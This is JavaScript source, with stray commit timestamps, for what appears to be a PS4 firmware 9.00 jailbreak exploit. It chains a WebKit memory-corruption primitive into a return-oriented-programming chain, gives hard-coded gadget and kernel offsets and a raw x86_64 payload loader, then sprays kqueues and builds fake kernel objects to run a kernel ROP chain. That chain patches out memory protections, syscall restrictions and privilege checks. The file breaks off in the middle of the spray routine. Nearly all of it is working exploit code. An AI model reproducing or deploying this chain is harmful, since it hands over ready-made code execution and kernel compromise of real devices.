2021-12-13 03:47:24 +01:00
var chain ;
var kchain ;
var kchain2 ;
var SAVED _KERNEL _STACK _PTR ;
var KERNEL _BASE _PTR ;
var webKitBase ;
var webKitRequirementBase ;
var libSceLibcInternalBase ;
var libKernelBase ;
var textArea = document . createElement ( "textarea" ) ;
const OFFSET _wk _vtable _first _element = 0x104F110 ;
const OFFSET _WK _memset _import = 0x000002A8 ;
const OFFSET _WK _ _ _stack _chk _fail _import = 0x00000178 ;
const OFFSET _WK _psl _builtin _import = 0xD68 ;
const OFFSET _WKR _psl _builtin = 0x33BA0 ;
const OFFSET _WK _setjmp _gadget _one = 0x0106ACF7 ;
const OFFSET _WK _setjmp _gadget _two = 0x01ECE1D3 ;
const OFFSET _WK _longjmp _gadget _one = 0x0106ACF7 ;
const OFFSET _WK _longjmp _gadget _two = 0x01ECE1D3 ;
const OFFSET _libcint _memset = 0x0004F810 ;
const OFFSET _libcint _setjmp = 0x000BB5BC ;
const OFFSET _libcint _longjmp = 0x000BB616 ;
const OFFSET _WK2 _TLS _IMAGE = 0x38e8020 ;
const OFFSET _lk _ _ _stack _chk _fail = 0x0001FF60 ;
const OFFSET _lk _pthread _create = 0x00025510 ;
const OFFSET _lk _pthread _join = 0x0000AFA0 ;
var nogc = [ ] ;
var syscalls = { } ;
var gadgets = { } ;
var wk _gadgetmap = {
"ret" : 0x32 ,
"pop rdi" : 0x319690 ,
"pop rsi" : 0x1F4D6 ,
"pop rdx" : 0x986C ,
"pop rcx" : 0x657B7 ,
"pop r8" : 0xAFAA71 ,
"pop r9" : 0x422571 ,
"pop rax" : 0x51A12 ,
"pop rsp" : 0x4E293 ,
"mov [rdi], rsi" : 0x1A97920 ,
"mov [rdi], rax" : 0x10788F7 ,
"mov [rdi], eax" : 0x9964BC ,
"cli ; pop rax" : 0x566F8 ,
"sti" : 0x1FBBCC ,
"mov rax, [rax]" : 0x241CC ,
"mov rax, [rsi]" : 0x5106A0 ,
"mov [rax], rsi" : 0x1EFD890 ,
"mov [rax], rdx" : 0x1426A82 ,
"mov [rax], edx" : 0x3B7FE4 ,
"add rax, rsi" : 0x170397E ,
"mov rdx, rax" : 0x53F501 ,
"add rax, rcx" : 0x2FBCD ,
"mov rsp, rdi" : 0x2048062 ,
"mov rdi, [rax + 8] ; call [rax]" : 0x751EE7 ,
2022-01-17 02:52:08 +01:00
"infloop" : 0x7DFF ,
"mov [rax], cl" : 0xC6EAF ,
2021-12-13 03:47:24 +01:00
} ;
var wkr _gadgetmap = {
"xchg rdi, rsp ; call [rsi - 0x79]" : 0x1d74f0 //JOP 3
} ;
var wk2 _gadgetmap = {
"mov [rax], rdi" : 0xFFDD7 ,
"mov [rax], rcx" : 0x2C9ECA ,
2022-01-17 02:52:08 +01:00
"mov [rax], cx" : 0x15A7D52 ,
2021-12-13 03:47:24 +01:00
} ;
var hmd _gadgetmap = {
"add [r8], r12" : 0x2BCE1
} ;
var ipmi _gadgetmap = {
"mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]" : 0x344B
} ;
function userland ( ) {
2021-12-18 16:19:46 +01:00
//RW -> ROP method is strongly based off of:
2021-12-18 05:30:41 +01:00
//https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit
2021-12-13 03:47:24 +01:00
p . launch _chain = launch _chain ;
p . malloc = malloc ;
p . malloc32 = malloc32 ;
p . stringify = stringify ;
p . array _from _address = array _from _address ;
p . readstr = readstr ;
//pointer to vtable address
var textAreaVtPtr = p . read8 ( p . leakval ( textArea ) . add32 ( 0x18 ) ) ;
//address of vtable
var textAreaVtable = p . read8 ( textAreaVtPtr ) ;
//use address of 1st entry (in .text) to calculate webkitbase
webKitBase = p . read8 ( textAreaVtable ) . sub32 ( OFFSET _wk _vtable _first _element ) ;
libSceLibcInternalBase = p . read8 ( get _jmptgt ( webKitBase . add32 ( OFFSET _WK _memset _import ) ) ) ;
libSceLibcInternalBase . sub32inplace ( OFFSET _libcint _memset ) ;
libKernelBase = p . read8 ( get _jmptgt ( webKitBase . add32 ( OFFSET _WK _ _ _stack _chk _fail _import ) ) ) ;
libKernelBase . sub32inplace ( OFFSET _lk _ _ _stack _chk _fail ) ;
webKitRequirementBase = p . read8 ( get _jmptgt ( webKitBase . add32 ( OFFSET _WK _psl _builtin _import ) ) ) ;
webKitRequirementBase . sub32inplace ( OFFSET _WKR _psl _builtin ) ;
for ( var gadget in wk _gadgetmap ) {
window . gadgets [ gadget ] = webKitBase . add32 ( wk _gadgetmap [ gadget ] ) ;
}
for ( var gadget in wkr _gadgetmap ) {
window . gadgets [ gadget ] = webKitRequirementBase . add32 ( wkr _gadgetmap [ gadget ] ) ;
}
function get _jmptgt ( address ) {
var instr = p . read4 ( address ) & 0xFFFF ;
var offset = p . read4 ( address . add32 ( 2 ) ) ;
if ( instr != 0x25FF ) {
return 0 ;
}
return address . add32 ( 0x6 + offset ) ;
}
function malloc ( sz ) {
var backing = new Uint8Array ( 0x10000 + sz ) ;
window . nogc . push ( backing ) ;
var ptr = p . read8 ( p . leakval ( backing ) . add32 ( 0x10 ) ) ;
ptr . backing = backing ;
return ptr ;
}
function malloc32 ( sz ) {
var backing = new Uint8Array ( 0x10000 + sz * 4 ) ;
window . nogc . push ( backing ) ;
var ptr = p . read8 ( p . leakval ( backing ) . add32 ( 0x10 ) ) ;
ptr . backing = new Uint32Array ( backing . buffer ) ;
return ptr ;
}
function array _from _address ( addr , size ) {
var og _array = new Uint32Array ( 0x1000 ) ;
var og _array _i = p . leakval ( og _array ) . add32 ( 0x10 ) ;
p . write8 ( og _array _i , addr ) ;
2022-01-17 02:52:08 +01:00
p . write4 ( og _array _i . add32 ( 0x8 ) , size ) ;
p . write4 ( og _array _i . add32 ( 0xC ) , 0x1 ) ;
2021-12-13 03:47:24 +01:00
nogc . push ( og _array ) ;
return og _array ;
}
function stringify ( str ) {
var bufView = new Uint8Array ( str . length + 1 ) ;
for ( var i = 0 ; i < str . length ; i ++ ) {
bufView [ i ] = str . charCodeAt ( i ) & 0xFF ;
}
window . nogc . push ( bufView ) ;
return p . read8 ( p . leakval ( bufView ) . add32 ( 0x10 ) ) ;
}
function readstr ( addr ) {
var str = "" ;
for ( var i = 0 ; ; i ++ ) {
var c = p . read1 ( addr . add32 ( i ) ) ;
if ( c == 0x0 ) {
break ;
}
str += String . fromCharCode ( c ) ;
}
return str ;
}
var fakeVtable _setjmp = p . malloc32 ( 0x200 ) ;
var fakeVtable _longjmp = p . malloc32 ( 0x200 ) ;
var original _context = p . malloc32 ( 0x40 ) ;
var modified _context = p . malloc32 ( 0x40 ) ;
p . write8 ( fakeVtable _setjmp . add32 ( 0x0 ) , fakeVtable _setjmp ) ;
p . write8 ( fakeVtable _setjmp . add32 ( 0xA8 ) , webKitBase . add32 ( OFFSET _WK _setjmp _gadget _two ) ) ; // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8]
p . write8 ( fakeVtable _setjmp . add32 ( 0x10 ) , original _context ) ;
p . write8 ( fakeVtable _setjmp . add32 ( 0x8 ) , libSceLibcInternalBase . add32 ( OFFSET _libcint _setjmp ) ) ;
p . write8 ( fakeVtable _setjmp . add32 ( 0x1C8 ) , webKitBase . add32 ( OFFSET _WK _setjmp _gadget _one ) ) ; // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8]
p . write8 ( fakeVtable _longjmp . add32 ( 0x0 ) , fakeVtable _longjmp ) ;
p . write8 ( fakeVtable _longjmp . add32 ( 0xA8 ) , webKitBase . add32 ( OFFSET _WK _longjmp _gadget _two ) ) ; // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8]
p . write8 ( fakeVtable _longjmp . add32 ( 0x10 ) , modified _context ) ;
p . write8 ( fakeVtable _longjmp . add32 ( 0x8 ) , libSceLibcInternalBase . add32 ( OFFSET _libcint _longjmp ) ) ;
p . write8 ( fakeVtable _longjmp . add32 ( 0x1C8 ) , webKitBase . add32 ( OFFSET _WK _longjmp _gadget _one ) ) ; // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8]
function launch _chain ( chain ) {
chain . push ( window . gadgets [ "pop rdi" ] ) ;
chain . push ( original _context ) ;
chain . push ( libSceLibcInternalBase . add32 ( OFFSET _libcint _longjmp ) ) ;
p . write8 ( textAreaVtPtr , fakeVtable _setjmp ) ;
textArea . scrollLeft = 0x0 ;
p . write8 ( modified _context . add32 ( 0x00 ) , window . gadgets [ "ret" ] ) ;
p . write8 ( modified _context . add32 ( 0x10 ) , chain . stack ) ;
p . write8 ( modified _context . add32 ( 0x40 ) , p . read8 ( original _context . add32 ( 0x40 ) ) )
p . write8 ( textAreaVtPtr , fakeVtable _longjmp ) ;
textArea . scrollLeft = 0x0 ;
p . write8 ( textAreaVtPtr , textAreaVtable ) ;
}
var kview = new Uint8Array ( 0x1000 ) ;
var kstr = p . leakval ( kview ) . add32 ( 0x10 ) ;
var orig _kview _buf = p . read8 ( kstr ) ;
p . write8 ( kstr , window . libKernelBase ) ;
p . write4 ( kstr . add32 ( 8 ) , 0x40000 ) ;
var countbytes ;
for ( var i = 0 ; i < 0x40000 ; i ++ ) {
if ( kview [ i ] == 0x72 && kview [ i + 1 ] == 0x64 && kview [ i + 2 ] == 0x6c && kview [ i + 3 ] == 0x6f && kview [ i + 4 ] == 0x63 ) {
countbytes = i ;
break ;
}
}
p . write4 ( kstr . add32 ( 8 ) , countbytes + 32 ) ;
var dview32 = new Uint32Array ( 1 ) ;
var dview8 = new Uint8Array ( dview32 . buffer ) ;
for ( var i = 0 ; i < countbytes ; i ++ ) {
if ( kview [ i ] == 0x48 && kview [ i + 1 ] == 0xc7 && kview [ i + 2 ] == 0xc0 && kview [ i + 7 ] == 0x49 && kview [ i + 8 ] == 0x89 && kview [ i + 9 ] == 0xca && kview [ i + 10 ] == 0x0f && kview [ i + 11 ] == 0x05 ) {
dview8 [ 0 ] = kview [ i + 3 ] ;
dview8 [ 1 ] = kview [ i + 4 ] ;
dview8 [ 2 ] = kview [ i + 5 ] ;
dview8 [ 3 ] = kview [ i + 6 ] ;
var syscallno = dview32 [ 0 ] ;
window . syscalls [ syscallno ] = window . libKernelBase . add32 ( i ) ;
}
}
p . write8 ( kstr , orig _kview _buf ) ;
chain = new rop ( ) ;
2022-01-17 02:52:08 +01:00
//Sanity check
if ( chain . syscall ( 20 ) . low == 0 ) {
alert ( "webkit exploit failed. Try again if your ps4 is on fw 9.00." ) ;
while ( 1 ) ;
}
2021-12-13 03:47:24 +01:00
}
function run _hax ( ) {
userland ( ) ;
if ( chain . syscall ( 23 , 0 ) . low != 0x0 ) {
kernel ( ) ;
//this wk exploit is pretty stable we can probably afford to kill webkit before payload loader but should we?.
2021-12-18 05:30:41 +01:00
//p.write8(0x0, 0x0); //write to 0x0 -> kill browser.
2021-12-13 03:47:24 +01:00
}
2022-01-17 02:52:08 +01:00
var payload _buffer = chain . syscall ( 477 , 0x0 , 0x300000 , 0x7 , 0x1000 , 0xFFFFFFFF , 0 ) ;
2021-12-13 03:47:24 +01:00
var payload _loader = p . malloc32 ( 0x1000 ) ;
2021-12-18 05:30:41 +01:00
//NOTE: You can replace this with a payload instead of the loader.
//You would need to create an array view of payload_buffer to do that. (var payload_writer = p.array_from_address(payload_buffer);)
//And other ways, ....
//This is x86_64 asm, you can disassemble it* if you want to know what the payload loader does under the hood. (* will need to account for endianness)
2021-12-13 03:47:24 +01:00
var loader _writer = payload _loader . backing ;
loader _writer [ 0 ] = 0x56415741 ;
loader _writer [ 1 ] = 0x83485541 ;
loader _writer [ 2 ] = 0x894818EC ;
loader _writer [ 3 ] = 0xC748243C ;
loader _writer [ 4 ] = 0x10082444 ;
loader _writer [ 5 ] = 0x483C2302 ;
loader _writer [ 6 ] = 0x102444C7 ;
loader _writer [ 7 ] = 0x00000000 ;
loader _writer [ 8 ] = 0x000002BF ;
loader _writer [ 9 ] = 0x0001BE00 ;
loader _writer [ 10 ] = 0xD2310000 ;
loader _writer [ 11 ] = 0x00009CE8 ;
loader _writer [ 12 ] = 0xC7894100 ;
loader _writer [ 13 ] = 0x8D48C789 ;
loader _writer [ 14 ] = 0xBA082474 ;
loader _writer [ 15 ] = 0x00000010 ;
loader _writer [ 16 ] = 0x000095E8 ;
loader _writer [ 17 ] = 0xFF894400 ;
loader _writer [ 18 ] = 0x000001BE ;
loader _writer [ 19 ] = 0x0095E800 ;
loader _writer [ 20 ] = 0x89440000 ;
loader _writer [ 21 ] = 0x31F631FF ;
loader _writer [ 22 ] = 0x0062E8D2 ;
loader _writer [ 23 ] = 0x89410000 ;
loader _writer [ 24 ] = 0x2C8B4CC6 ;
loader _writer [ 25 ] = 0x45C64124 ;
loader _writer [ 26 ] = 0x05EBC300 ;
loader _writer [ 27 ] = 0x01499848 ;
loader _writer [ 28 ] = 0xF78944C5 ;
loader _writer [ 29 ] = 0xBAEE894C ;
loader _writer [ 30 ] = 0x00001000 ;
loader _writer [ 31 ] = 0x000025E8 ;
loader _writer [ 32 ] = 0x7FC08500 ;
loader _writer [ 33 ] = 0xFF8944E7 ;
loader _writer [ 34 ] = 0x000026E8 ;
loader _writer [ 35 ] = 0xF7894400 ;
loader _writer [ 36 ] = 0x00001EE8 ;
loader _writer [ 37 ] = 0x2414FF00 ;
loader _writer [ 38 ] = 0x18C48348 ;
loader _writer [ 39 ] = 0x5E415D41 ;
loader _writer [ 40 ] = 0x31485F41 ;
loader _writer [ 41 ] = 0xC748C3C0 ;
loader _writer [ 42 ] = 0x000003C0 ;
loader _writer [ 43 ] = 0xCA894900 ;
loader _writer [ 44 ] = 0x48C3050F ;
loader _writer [ 45 ] = 0x0006C0C7 ;
loader _writer [ 46 ] = 0x89490000 ;
loader _writer [ 47 ] = 0xC3050FCA ;
loader _writer [ 48 ] = 0x1EC0C748 ;
loader _writer [ 49 ] = 0x49000000 ;
loader _writer [ 50 ] = 0x050FCA89 ;
loader _writer [ 51 ] = 0xC0C748C3 ;
loader _writer [ 52 ] = 0x00000061 ;
loader _writer [ 53 ] = 0x0FCA8949 ;
loader _writer [ 54 ] = 0xC748C305 ;
loader _writer [ 55 ] = 0x000068C0 ;
loader _writer [ 56 ] = 0xCA894900 ;
loader _writer [ 57 ] = 0x48C3050F ;
loader _writer [ 58 ] = 0x006AC0C7 ;
loader _writer [ 59 ] = 0x89490000 ;
loader _writer [ 60 ] = 0xC3050FCA ;
chain . syscall ( 74 , payload _loader , 0x4000 , ( 0x1 | 0x2 | 0x4 ) ) ;
var pthread = p . malloc ( 0x10 ) ;
2022-01-17 02:52:08 +01:00
//
{
chain . fcall ( window . syscalls [ 203 ] , payload _buffer , 0x300000 ) ;
chain . fcall ( libKernelBase . add32 ( OFFSET _lk _pthread _create ) , pthread , 0x0 , payload _loader , payload _buffer ) ;
}
chain . run ( ) ;
2021-12-13 03:47:24 +01:00
awaitpl ( ) ;
}
function kernel ( ) {
extra _gadgets ( ) ;
kchain _setup ( ) ;
object _setup ( ) ;
trigger _spray ( ) ;
2022-01-17 02:52:08 +01:00
patch _once ( ) ;
2021-12-13 03:47:24 +01:00
}
var handle ;
var random _path ;
var ex _info ;
function load _prx ( name ) {
//sys_dynlib_load_prx
var res = chain . syscall ( 594 , p . stringify ( ` / ${ random _path } /common/lib/ ${ name } ` ) , 0x0 , handle , 0x0 ) ;
if ( res . low != 0x0 ) {
alert ( "failed to load prx/get handle " + name ) ;
}
//sys_dynlib_get_info_ex
p . write8 ( ex _info , 0x1A8 ) ;
res = chain . syscall ( 608 , p . read4 ( handle ) , 0x0 , ex _info ) ;
if ( res . low != 0x0 ) {
alert ( "failed to get module info from handle" ) ;
}
var tlsinit = p . read8 ( ex _info . add32 ( 0x110 ) ) ;
var tlssize = p . read4 ( ex _info . add32 ( 0x11C ) ) ;
if ( tlssize != 0 ) {
if ( name == "libSceWebKit2.sprx" ) {
tlsinit . sub32inplace ( OFFSET _WK2 _TLS _IMAGE ) ;
} else {
alert ( ` ${ name } , tlssize is non zero. this usually indicates that this module has a tls phdr with real data. You can hardcode the imgage to base offset here if you really wish to use one of these. ` ) ;
}
}
return tlsinit ;
}
2021-12-18 05:30:41 +01:00
//Obtain extra gadgets through module loading
2021-12-13 03:47:24 +01:00
function extra _gadgets ( ) {
2022-01-17 02:52:08 +01:00
handle = p . malloc ( 0x1E8 ) ;
var randomized _path _length _ptr = handle . add32 ( 0x4 ) ;
var randomized _path _ptr = handle . add32 ( 0x14 ) ;
ex _info = randomized _path _ptr . add32 ( 0x40 ) ;
2021-12-13 03:47:24 +01:00
2022-01-17 02:52:08 +01:00
p . write8 ( randomized _path _length _ptr , 0x2C ) ;
chain . syscall ( 602 , 0 , randomized _path _ptr , randomized _path _length _ptr ) ;
2021-12-13 03:47:24 +01:00
random _path = p . readstr ( randomized _path _ptr ) ;
var ipmi _addr = load _prx ( "libSceIpmi.sprx" ) ;
var hmd _addr = load _prx ( "libSceHmd.sprx" ) ;
var wk2 _addr = load _prx ( "libSceWebKit2.sprx" ) ;
for ( var gadget in hmd _gadgetmap ) {
window . gadgets [ gadget ] = hmd _addr . add32 ( hmd _gadgetmap [ gadget ] ) ;
}
for ( var gadget in wk2 _gadgetmap ) {
window . gadgets [ gadget ] = wk2 _addr . add32 ( wk2 _gadgetmap [ gadget ] ) ;
}
for ( var gadget in ipmi _gadgetmap ) {
window . gadgets [ gadget ] = ipmi _addr . add32 ( ipmi _gadgetmap [ gadget ] ) ;
}
for ( var gadget in window . gadgets ) {
p . read8 ( window . gadgets [ gadget ] ) ;
2022-01-17 02:52:08 +01:00
//Ensure all gadgets are available to kernel.
chain . fcall ( window . syscalls [ 203 ] , window . gadgets [ gadget ] , 0x10 ) ;
2021-12-13 03:47:24 +01:00
}
2022-01-17 02:52:08 +01:00
chain . run ( ) ;
2021-12-13 03:47:24 +01:00
}
2021-12-18 05:30:41 +01:00
//Build the kernel rop chain, this is what the kernel will be executing when the fake obj pivots the stack.
2021-12-13 03:47:24 +01:00
function kchain _setup ( ) {
2022-01-17 02:52:08 +01:00
const KERNEL _busy = 0x1B28DF8 ;
const KERNEL _bcopy = 0xACD ;
const KERNEL _bzero = 0x2713FD ;
const KERNEL _pagezero = 0x271441 ;
const KERNEL _memcpy = 0x2714BD ;
const KERNEL _pagecopy = 0x271501 ;
const KERNEL _copyin = 0x2716AD ;
const KERNEL _copyinstr = 0x271B5D ;
const KERNEL _copystr = 0x271C2D ;
2021-12-13 03:47:24 +01:00
const KERNEL _setidt = 0x312c40 ;
const KERNEL _setcr0 = 0x1FB949 ;
const KERNEL _Xill = 0x17d500 ;
const KERNEL _veriPatch = 0x626874 ;
const KERNEL _enable _syscalls _1 = 0x490 ;
const KERNEL _enable _syscalls _2 = 0x4B5 ;
const KERNEL _enable _syscalls _3 = 0x4B9 ;
const KERNEL _enable _syscalls _4 = 0x4C2 ;
const KERNEL _mprotect = 0x80B8D ;
const KERNEL _prx = 0x23AEC4 ;
const KERNEL _dlsym _1 = 0x23B67F ;
const KERNEL _dlsym _2 = 0x221b40 ;
const KERNEL _setuid = 0x1A06 ;
const KERNEL _syscall11 _1 = 0x1100520 ;
const KERNEL _syscall11 _2 = 0x1100528 ;
const KERNEL _syscall11 _3 = 0x110054C ;
const KERNEL _syscall11 _gadget = 0x4c7ad ;
2022-01-17 02:52:08 +01:00
const KERNEL _mmap _1 = 0x16632A ;
const KERNEL _mmap _2 = 0x16632D ;
2021-12-13 03:47:24 +01:00
const KERNEL _setcr0 _patch = 0x3ade3B ;
const KERNEL _kqueue _close _epi = 0x398991 ;
SAVED _KERNEL _STACK _PTR = p . malloc ( 0x200 ) ;
KERNEL _BASE _PTR = SAVED _KERNEL _STACK _PTR . add32 ( 0x8 ) ;
//negative offset of kqueue string to kernel base
//0xFFFFFFFFFF86B593 0x505
//0xFFFFFFFFFF80E364 0x900
p . write8 ( KERNEL _BASE _PTR , new int64 ( 0xFF80E364 , 0xFFFFFFFF ) ) ;
kchain = new rop ( ) ;
kchain2 = new rop ( ) ;
2022-01-17 02:52:08 +01:00
//Ensure the krop stack remains available.
{
chain . fcall ( window . syscalls [ 203 ] , kchain . stackback , 0x40000 ) ;
chain . fcall ( window . syscalls [ 203 ] , kchain2 . stackback , 0x40000 ) ;
chain . fcall ( window . syscalls [ 203 ] , SAVED _KERNEL _STACK _PTR , 0x10 ) ;
}
chain . run ( ) ;
2021-12-13 03:47:24 +01:00
kchain . count = 0 ;
kchain2 . count = 0 ;
kchain . set _kernel _var ( KERNEL _BASE _PTR ) ;
kchain2 . set _kernel _var ( KERNEL _BASE _PTR ) ;
kchain . push ( gadgets [ "pop rax" ] ) ;
kchain . push ( SAVED _KERNEL _STACK _PTR ) ;
kchain . push ( gadgets [ "mov [rax], rdi" ] ) ;
kchain . push ( gadgets [ "pop r8" ] ) ;
kchain . push ( KERNEL _BASE _PTR ) ;
kchain . push ( gadgets [ "add [r8], r12" ] ) ;
2022-01-17 02:52:08 +01:00
//Sorry we're closed
kchain . kwrite1 ( KERNEL _busy , 0x1 ) ;
kchain . push ( gadgets [ "sti" ] ) ; //it should be safe to re-enable interrupts now.
2021-12-13 03:47:24 +01:00
var idx1 = kchain . write _kernel _addr _to _chain _later ( KERNEL _setidt ) ;
var idx2 = kchain . write _kernel _addr _to _chain _later ( KERNEL _setcr0 ) ;
//Modify UD
kchain . push ( gadgets [ "pop rdi" ] ) ;
kchain . push ( 0x6 ) ;
kchain . push ( gadgets [ "pop rsi" ] ) ;
kchain . push ( gadgets [ "mov rsp, rdi" ] ) ;
kchain . push ( gadgets [ "pop rdx" ] ) ;
kchain . push ( 0xE ) ;
kchain . push ( gadgets [ "pop rcx" ] ) ;
kchain . push ( 0x0 ) ;
kchain . push ( gadgets [ "pop r8" ] ) ;
kchain . push ( 0x0 ) ;
var idx1 _dest = kchain . get _rsp ( ) ;
kchain . pushSymbolic ( ) ; // overwritten with KERNEL_setidt
kchain . push ( gadgets [ "pop rsi" ] ) ;
kchain . push ( 0x80040033 ) ;
kchain . push ( gadgets [ "pop rdi" ] ) ;
kchain . push ( kchain2 . stack ) ;
var idx2 _dest = kchain . get _rsp ( ) ;
kchain . pushSymbolic ( ) ; // overwritten with KERNEL_setcr0
kchain . finalizeSymbolic ( idx1 , idx1 _dest ) ;
kchain . finalizeSymbolic ( idx2 , idx2 _dest ) ;
2022-01-17 02:52:08 +01:00
//Initial patch(es)
kchain2 . kwrite2 ( KERNEL _veriPatch , 0x9090 ) ;
kchain2 . kwrite1 ( KERNEL _bcopy , 0xEB ) ;
//might as well do the others
kchain2 . kwrite1 ( KERNEL _bzero , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _pagezero , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _memcpy , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _pagecopy , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _copyin , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _copyinstr , 0xEB ) ;
kchain2 . kwrite1 ( KERNEL _copystr , 0xEB ) ;
//I guess you're not all that bad...
kchain2 . kwrite1 ( KERNEL _busy , 0x0 ) ; //it should now be safe to handle timer-y interrupts again
//Restore original UD
2021-12-13 03:47:24 +01:00
var idx3 = kchain2 . write _kernel _addr _to _chain _later ( KERNEL _Xill ) ;
var idx4 = kchain2 . write _kernel _addr _to _chain _later ( KERNEL _setidt ) ;
kchain2 . push ( gadgets [ "pop rdi" ] ) ;
kchain2 . push ( 0x6 ) ;
kchain2 . push ( gadgets [ "pop rsi" ] ) ;
var idx3 _dest = kchain2 . get _rsp ( ) ;
kchain2 . pushSymbolic ( ) ; // overwritten with KERNEL_Xill
kchain2 . push ( gadgets [ "pop rdx" ] ) ;
kchain2 . push ( 0xE ) ;
kchain2 . push ( gadgets [ "pop rcx" ] ) ;
kchain2 . push ( 0x0 ) ;
kchain2 . push ( gadgets [ "pop r8" ] ) ;
kchain2 . push ( 0x0 ) ;
var idx4 _dest = kchain2 . get _rsp ( ) ;
kchain2 . pushSymbolic ( ) ; // overwritten with KERNEL_setidt
kchain2 . finalizeSymbolic ( idx3 , idx3 _dest ) ;
kchain2 . finalizeSymbolic ( idx4 , idx4 _dest ) ;
//Apply kernel patches
kchain2 . kwrite4 ( KERNEL _enable _syscalls _1 , 0x00000000 ) ;
//patch in reverse because /shrug
2022-01-17 02:52:08 +01:00
kchain2 . kwrite1 ( KERNEL _enable _syscalls _4 , 0xEB ) ;
kchain2 . kwrite2 ( KERNEL _enable _syscalls _3 , 0x9090 ) ;
kchain2 . kwrite2 ( KERNEL _enable _syscalls _2 , 0x9090 ) ;
2021-12-13 03:47:24 +01:00
2022-01-17 02:52:08 +01:00
kchain2 . kwrite1 ( KERNEL _setuid , 0xEB ) ;
2021-12-13 03:47:24 +01:00
kchain2 . kwrite4 ( KERNEL _mprotect , 0x00000000 ) ;
2022-01-17 02:52:08 +01:00
kchain2 . kwrite2 ( KERNEL _prx , 0xE990 ) ;
kchain2 . kwrite1 ( KERNEL _dlsym _1 , 0xEB ) ;
2021-12-13 03:47:24 +01:00
kchain2 . kwrite4 ( KERNEL _dlsym _2 , 0xC3C03148 ) ;
2022-01-17 02:52:08 +01:00
kchain2 . kwrite1 ( KERNEL _mmap _1 , 0x37 ) ;
kchain2 . kwrite1 ( KERNEL _mmap _2 , 0x37 ) ;
2021-12-13 03:47:24 +01:00
kchain2 . kwrite4 ( KERNEL _syscall11 _1 , 0x00000002 ) ;
kchain2 . kwrite8 _kaddr ( KERNEL _syscall11 _2 , KERNEL _syscall11 _gadget ) ;
kchain2 . kwrite4 ( KERNEL _syscall11 _3 , 0x00000001 ) ;
//Restore CR0
kchain2 . kwrite4 ( KERNEL _setcr0 _patch , 0xC3C7220F ) ;
var idx5 = kchain2 . write _kernel _addr _to _chain _later ( KERNEL _setcr0 _patch ) ;
kchain2 . push ( gadgets [ "pop rdi" ] ) ;
kchain2 . push ( 0x80050033 ) ;
var idx5 _dest = kchain2 . get _rsp ( ) ;
kchain2 . pushSymbolic ( ) ; // overwritten with KERNEL_setcr0_patch
kchain2 . finalizeSymbolic ( idx5 , idx5 _dest ) ;
//Recover
kchain2 . rax _kernel ( KERNEL _kqueue _close _epi ) ;
kchain2 . push ( gadgets [ "mov rdx, rax" ] ) ;
kchain2 . push ( gadgets [ "pop rsi" ] ) ;
kchain2 . push ( SAVED _KERNEL _STACK _PTR ) ;
kchain2 . push ( gadgets [ "mov rax, [rsi]" ] ) ;
kchain2 . push ( gadgets [ "pop rcx" ] ) ;
kchain2 . push ( 0x10 ) ;
kchain2 . push ( gadgets [ "add rax, rcx" ] ) ;
kchain2 . push ( gadgets [ "mov [rax], rdx" ] ) ;
kchain2 . push ( gadgets [ "pop rdi" ] ) ;
var idx6 = kchain2 . pushSymbolic ( ) ;
kchain2 . push ( gadgets [ "mov [rdi], rax" ] ) ;
kchain2 . push ( gadgets [ "sti" ] ) ;
kchain2 . push ( gadgets [ "pop rsp" ] ) ;
var idx6 _dest = kchain2 . get _rsp ( ) ;
kchain2 . pushSymbolic ( ) ; // overwritten with old stack pointer
kchain2 . finalizeSymbolic ( idx6 , idx6 _dest ) ;
}
function object _setup ( ) {
//Map fake object
2022-01-17 02:52:08 +01:00
var fake _knote = chain . syscall ( 477 , 0x4000 , 0x4000 * 0x3 , 0x3 , 0x1010 , 0xFFFFFFFF , 0x0 ) ;
2021-12-13 03:47:24 +01:00
var fake _filtops = fake _knote . add32 ( 0x4000 ) ;
var fake _obj = fake _knote . add32 ( 0x8000 ) ;
if ( fake _knote . low != 0x4000 ) {
alert ( "enomem: " + fake _knote ) ;
while ( 1 ) ;
}
//setup fake object
//KNOTE
{
p . write8 ( fake _knote , fake _obj ) ;
p . write8 ( fake _knote . add32 ( 0x68 ) , fake _filtops )
}
//FILTOPS
{
p . write8 ( fake _filtops . sub32 ( 0x79 ) , gadgets [ "cli ; pop rax" ] ) ; //cli ; pop rax ; ret
p . write8 ( fake _filtops . add32 ( 0x0 ) , gadgets [ "xchg rdi, rsp ; call [rsi - 0x79]" ] ) ; //xchg rdi, rsp ; call qword ptr [rsi - 0x79]
p . write8 ( fake _filtops . add32 ( 0x8 ) , kchain . stack ) ;
p . write8 ( fake _filtops . add32 ( 0x10 ) , gadgets [ "mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]" ] ) ; //mov rcx, qword ptr [rdi] ; mov rsi, rax ; call qword ptr [rcx + 0x30]
}
//OBJ
{
p . write8 ( fake _obj . add32 ( 0x30 ) , gadgets [ "mov rdi, [rax + 8] ; call [rax]" ] ) ; //mov rdi, qword ptr [rax + 8] ; call qword ptr [rax]
}
2022-01-17 02:52:08 +01:00
//Ensure the fake knote remains available
chain . syscall ( 203 , fake _knote , 0xC000 ) ;
2021-12-13 03:47:24 +01:00
}
var trigger _spray = function ( ) {
var NUM _KQUEUES = 0x1B0 ;
var kqueue _ptr = p . malloc ( NUM _KQUEUES * 0x4 ) ;
2021-12-18 05:30:41 +01:00
//Make kqueues
2021-12-13 03:47:24 +01:00
{
for ( var i = 0 ; i < NUM _KQUEUES ; i ++ ) {
chain . fcall ( window . syscalls [ 362 ] ) ;
chain . write _result4 ( kqueue _ptr . add32 ( 0x4 * i ) ) ;
}
}
chain . run ( ) ;
var kqueues = p . array _from _address ( kqueue _ptr , NUM _KQUEUES ) ;
var that _one _socket = chain . syscall ( 97 , 2 , 1 , 0 ) ;
if ( that _one _socket . low < 0x100 || that _one _socket . low >= 0x200 ) {
alert ( "invalid socket" ) ;
while ( 1 ) ;
}
//Spray kevents
var kevent = p . malloc ( 0x20 ) ;
p . write8 ( kevent . add32 ( 0x0 ) , that _one _socket ) ;
